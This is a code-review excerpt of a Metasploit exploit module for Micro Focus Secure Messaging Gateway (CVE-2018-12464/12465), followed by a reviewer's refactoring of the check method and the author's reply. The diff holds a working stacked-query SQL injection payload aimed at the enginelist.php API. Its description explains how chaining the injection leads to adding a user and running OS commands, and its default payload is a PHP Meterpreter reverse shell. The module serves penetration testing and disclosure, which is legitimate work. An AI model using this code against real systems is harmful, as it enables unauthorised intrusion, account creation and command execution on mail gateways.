modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb

```diff
@@ -0,0 +1,214 @@
+
+        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
+        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
+        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
+        to access this endpoint without having a valid session.
+
+        Combining these vulnerabilities gives the opportunity execute operation system commands under the context
+        of the web user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
+          ['CVE', '2018-12464'],
+          ['CVE', '2018-12465'],
+          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
+          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload' => 'php/meterpreter/reverse_tcp',
+          'Encoder' => 'php/base64'
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jun 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+  end
+
+  def execute_query(query)
+    #
+    # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
+    # but since we are able to use stacked-query approach, following form of payload is required in order to be able
+    # get back the output of query !
+    #
+    r = rand_text_alphanumeric(3 + rand(3))
+    sql = r
+    sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
+    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
+    sql << query
+    sql << "; -- "
+    sql << r
+
+    send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
+      'vars_post' => {
+        'appkey' => r
+      }
+    )
+
+  end
+
+  def something_went_wrong
+    fail_with Failure::Unknown, 'Something went wrong'
+  end
+
+  def check
```

Comment:
The `rand_text_*` methods now accept a range as an argument.

`Exploit` is redundant in this context.

It's polite to print a verbose error message and return `CheckCode::Unknown` when the connection fails.

Refactored:

```ruby
  def check
    r = rand_text_numeric(15..35)
    res = execute_query("SELECT #{r}")

    unless res?
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body.include?(r)
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end
```

Reply:
Done, thanks for reviewing !